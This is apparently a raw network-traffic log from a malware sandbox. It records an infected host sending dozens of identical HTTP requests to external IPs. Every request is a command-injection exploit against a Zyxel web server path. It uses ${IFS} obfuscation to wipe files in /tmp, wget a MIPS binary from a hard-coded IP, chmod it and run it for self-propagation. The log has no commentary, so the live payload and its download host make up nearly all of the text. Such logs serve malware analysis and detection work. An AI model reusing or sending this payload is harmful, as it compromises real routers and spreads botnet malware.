                                                        Jan 28, 2024 10:13:03.608146906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7070192.168.2.1437300104.165.41.168443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608192921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7071192.168.2.1446330159.35.224.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608237982 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7072192.168.2.1459350152.181.126.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608275890 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7073192.168.2.144835413.253.3.217443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608315945 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7074192.168.2.1458220160.72.180.105443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608371019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7075192.168.2.1440234176.226.165.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608387947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7076192.168.2.1442138197.26.53.61443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608443022 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7077192.168.2.144630087.205.34.189443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608479977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7078192.168.2.145943013.71.131.191443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608508110 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7079192.168.2.1458090181.103.163.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608536959 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7080192.168.2.1454216128.76.0.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608591080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7081192.168.2.1458692203.14.52.3443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608607054 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7082192.168.2.1440006114.146.203.143443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608639956 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7083192.168.2.143878687.106.236.171443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608696938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7084192.168.2.143315486.80.19.104443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608747005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7085192.168.2.1455998182.37.201.232443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608774900 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7086192.168.2.144876492.63.235.83443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608809948 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7087192.168.2.1456254113.168.176.107443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608849049 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7088192.168.2.145562651.128.106.184443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608875990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7089192.168.2.143899238.74.149.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608927011 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7090192.168.2.1446862131.195.199.192443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.608951092 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7091192.168.2.145260046.209.171.55443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609010935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7092192.168.2.143704477.87.115.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609091043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7093192.168.2.146059264.43.3.146443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609143019 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7094192.168.2.1454278109.188.102.181443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609174967 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7095192.168.2.1445798171.125.62.204443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609190941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7096192.168.2.145374280.200.54.229443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609215975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7097192.168.2.1436814164.95.168.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609262943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7098192.168.2.1436348172.61.46.212443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609293938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7099192.168.2.1450104204.94.226.151443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609317064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7100192.168.2.144831090.225.99.207443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609368086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7101192.168.2.145693443.11.214.98443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609404087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7102192.168.2.144963427.152.28.190443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609448910 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7103192.168.2.1447252211.69.249.19443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609481096 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7104192.168.2.1442084106.128.206.48443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609594107 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7105192.168.2.145133651.153.128.2443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609632969 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7106192.168.2.1454288150.111.212.78443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609648943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7107192.168.2.1460968162.221.225.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609688997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7108192.168.2.1434546155.248.195.169443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609725952 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7109192.168.2.1439220173.102.86.197443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609755039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7110192.168.2.143864037.41.95.221443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609785080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7111192.168.2.144509449.84.127.148443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609828949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7112192.168.2.145291457.130.124.175443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609872103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7113192.168.2.14513281.192.88.21443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609932899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7114192.168.2.143407471.215.18.5443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609982014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7115192.168.2.1449786194.27.218.194443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.609998941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7116192.168.2.145053263.31.248.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610059023 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7117192.168.2.1452148211.1.118.6443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610109091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7118192.168.2.1454674173.28.224.72443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610150099 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7119192.168.2.144499052.129.190.203443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610177040 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7120192.168.2.1436208177.18.31.44443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610209942 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7121192.168.2.144848483.48.151.154443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610236883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7122192.168.2.1452552211.128.50.196443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610272884 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7123192.168.2.143370667.105.195.225443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610332966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7124192.168.2.1441836222.239.5.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610384941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7125192.168.2.143912441.147.16.28443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610430002 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7126192.168.2.1451936184.20.31.209443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610476971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7127192.168.2.143709427.214.250.90443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610502005 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7128192.168.2.1435922126.12.104.167443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610557079 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7129192.168.2.145834259.118.242.92443
                                                        TimestampBytes transferredDirectionData
                                                        Jan 28, 2024 10:13:03.610588074 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        7130192.168.2.1444900178.187.155.101443
                                                        TimestampBytes transferredDirectionData
